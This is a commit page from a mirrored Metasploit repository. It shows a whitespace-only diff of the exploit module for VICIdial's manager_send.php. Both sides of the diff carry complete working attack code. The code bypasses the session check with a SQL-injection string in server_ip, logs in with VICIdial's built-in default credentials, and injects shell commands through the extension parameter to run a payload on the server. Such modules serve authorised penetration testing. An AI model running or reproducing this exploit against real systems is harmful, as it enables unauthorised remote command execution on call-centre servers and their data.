infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Ran resplat.rb and retab.rb. Fixed msftidy issues.

bug/bundler_fix
AverageSecurityGuy 2013-10-23 20:59:27 -04:00
parent 655e09f007
commit ecbbd7bb4b
1 changed files with 95 additions and 95 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

190
modules/exploits/multi/http/vicidial_manager_send_cmd_exec.rb
View File

@ -6,109 +6,109 @@
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'VICIdial Manager Send OS Command Injection',
'Description' => %q{
The file agc/manager_send.php in the VICIdial web application uses
unsanitized user input as part of a command that is executed using the PHP
passthru() function. A valid username, password and session are needed to access
the injection point. Fortunately, VICIdial has two built-in accounts with default
passwords and the manager_send.php file has a SQL injection vulnerability that can
be used to bypass the session check as long as at least one session has been
created at some point in time. The results of the injected command are returned
as part of the response from the web server. Affected versions include 2.7RC1,
2.7, and 2.8-403a. Other versions are likely affected as well. The default
credentials used by Vicidial are VDCL/donotedit and VDAD/donotedit.
},
'Author' =>
[
'Adam Caudill <adam@adamcaudill.com>', # Vulnerability discovery
'AverageSecurityGuy <stephen@averagesecurityguy.info>' # Metasploit Module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'URL', 'http://www.openwall.com/lists/oss-security/2013/10/23/10' ]
],
'DisclosureDate' => 'Oct 23 2013',
'Privileged' => true,
'Platform' => ['linux','unix'],
'Payload' =>
{
'DisableNops' => true
},
'Targets' =>
[
[ 'CMD',
{
'Arch' => ARCH_CMD,
'Platform' => 'unix'
}
],
],
'DefaultTarget' => 0
))
def initialize(info = {})
super(update_info(info,
'Name' => 'VICIdial Manager Send OS Command Injection',
'Description' => %q{
The file agc/manager_send.php in the VICIdial web application uses
unsanitized user input as part of a command that is executed using the PHP
passthru() function. A valid username, password and session are needed to access
the injection point. Fortunately, VICIdial has two built-in accounts with default
passwords and the manager_send.php file has a SQL injection vulnerability that can
be used to bypass the session check as long as at least one session has been
created at some point in time. The results of the injected command are returned
as part of the response from the web server. Affected versions include 2.7RC1,
2.7, and 2.8-403a. Other versions are likely affected as well. The default
credentials used by Vicidial are VDCL/donotedit and VDAD/donotedit.
},
'Author' =>
[
'Adam Caudill <adam@adamcaudill.com>', # Vulnerability discovery
'AverageSecurityGuy <stephen@averagesecurityguy.info>' # Metasploit Module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'URL', 'http://www.openwall.com/lists/oss-security/2013/10/23/10' ]
],
'DisclosureDate' => 'Oct 23 2013',
'Privileged' => true,
'Platform' => ['linux','unix'],
'Payload' =>
{
'DisableNops' => true
},
'Targets' =>
[
[ 'CMD',
{
'Arch' => ARCH_CMD,
'Platform' => 'unix'
}
],
],
'DefaultTarget' => 0
))
register_options(
[
OptString.new('USERNAME', [true, 'VICIdial Username', 'VDCL']),
OptString.new('PASSWORD', [true, 'VICIdial Password', 'donotedit'])
], self.class)
end
register_options(
[
OptString.new('USERNAME', [true, 'VICIdial Username', 'VDCL']),
OptString.new('PASSWORD', [true, 'VICIdial Password', 'donotedit'])
], self.class)
end
def request(cmd)
begin
res = send_request_cgi({
'uri' => '/agc/manager_send.php',
'method' => 'GET',
'vars_get' => {
"enable_sipsak_messages" => "1",
"allow_sipsak_messages" => "1",
"protocol" => "sip",
"ACTION" => "OriginateVDRelogin",
"session_name" => rand_text_alpha(12), # Random session name
"server_ip" => "' OR '1' = '1", # SQL Injection to validate the session
"extension" => ";#{cmd};",
"user" => datastore['USERNAME'],
"pass" => datastore['PASSWORD']
}
})
def request(cmd)
begin
res = send_request_cgi({
'uri' => '/agc/manager_send.php',
'method' => 'GET',
'vars_get' => {
"enable_sipsak_messages" => "1",
"allow_sipsak_messages" => "1",
"protocol" => "sip",
"ACTION" => "OriginateVDRelogin",
"session_name" => rand_text_alpha(12), # Random session name
"server_ip" => "' OR '1' = '1", # SQL Injection to validate the session
"extension" => ";#{cmd};",
"user" => datastore['USERNAME'],
"pass" => datastore['PASSWORD']
}
})
if res.nil? or res.code == 404
vprint_error("#{rhost}:#{rport} - No response or page not found.")
return nil
end
if res.nil? or res.code == 404
vprint_error("#{rhost}:#{rport} - No response or page not found.")
return nil
end
if res.body =~ /Invalid Username\/Password/
vprint_error("#{rhost}:#{rport} - Invalid Username or Password.")
return nil
end
if res.body =~ /Invalid Username\/Password/
vprint_error("#{rhost}:#{rport} - Invalid Username or Password.")
return nil
end
return res
rescue ::Rex::ConnectionError
vprint_error("#{rhost}:#{rport} - Failed to connect to the web server")
return nil
end
end
return res
rescue ::Rex::ConnectionError
vprint_error("#{rhost}:#{rport} - Failed to connect to the web server")
return nil
end
end
def check
resp = request('ls -a .')
vprint_line(resp.body)
if resp.body =~ /\.\n\.\.\n/m
return Exploit::CheckCode::Vulnerable
else
return Exploit::CheckCode::Detected
end
end
def check
resp = request('ls -a .')
def exploit
request("#{payload.encode}")
end
vprint_line(resp.body)
if resp.body =~ /\.\n\.\.\n/m
return Exploit::CheckCode::Vulnerable
else
return Exploit::CheckCode::Detected
end
end
def exploit
request("#{payload.encode}")
end
end